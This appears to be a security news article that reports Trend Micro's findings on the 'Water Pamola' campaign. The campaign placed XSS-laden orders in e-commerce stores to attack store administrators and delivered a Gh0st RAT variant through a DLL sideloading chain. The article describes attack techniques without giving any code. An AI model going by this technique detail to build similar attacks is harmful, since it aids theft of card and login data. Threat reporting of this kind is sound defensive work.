Trend Micro cybersecurity team has described a threat campaign they dubbed as “Water Pamola” in which hackers compromised e-commerce stores in Japan, Australia, and Europe. Cybercriminals targeted victims via spam emails with malicious attachments. Trend Micro has been tracking this campaign since 2019.
Since early 2020, attackers changed their tactics. They didn’t target victims with spam but execute malicious scripts when the administrators view customer orders in the online store’s admin panel. Moreover, attackers started to focus on victims mainly located in Japan.
The script connects to the attackers’ server to download additional payloads. Water Pamola searched for stores vulnerable to the XSS attack and placed orders with this embedded XSS script which ran when store admins or users opened the order within their management panels.
“Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators,” researchers wrote in a report this week.
The many scripts Trend Micro collected in the attacks had had capabilities as page grabbing, web shell infection, credential phishing, and malware delivery. The malware can steal personal information, which included names, credit card numbers, card expiration dates, and credit card security codes.
The attackers’ goal is likely financial gains, and this campaign is similar to Magecart campaigns, researchers say.
Trend Micro researchers noted that attackers did not target a specific e-commerce framework, but any e-commerce stores vulnerable to XSS attacks.
The Water Pamola attackers used the XSS.ME attack framework which helps attackers to manage their attack scripts and stolen information. The source code of this framework is available publicly on many Chinese hacker forums.
Attackers used different methods for infection of the store users. In one technique, the XSS attack script redirected victims to a fake Flash download site that ultimately, dropped a malicious executable”
“AdobeAirFlashInstaller.exe (legitimate file) sideloads xerces-c_2_1_0.dll (patched legitimate file), which then sideloads ulibs.dll (malicious file). Ulibs.dll loads Adob.dll, which is a ZIP archive. After extracting the content of the Adob.dll zip archive, two legitimate and signed executable files are present and executed, and a similar sideloading process happens once more… At the end, the last payload of this infection chain is a variant of a Gh0st RAT. Communication with C&C uses sockets and is encrypted with simple SUB 0x46, XOR 0x19 encryption,” researchers explained.
Water Pamola also conducted social engineering attacks to phish out user credentials or lure the victim into downloading a remote access tool. Indicators of compromise can be found here.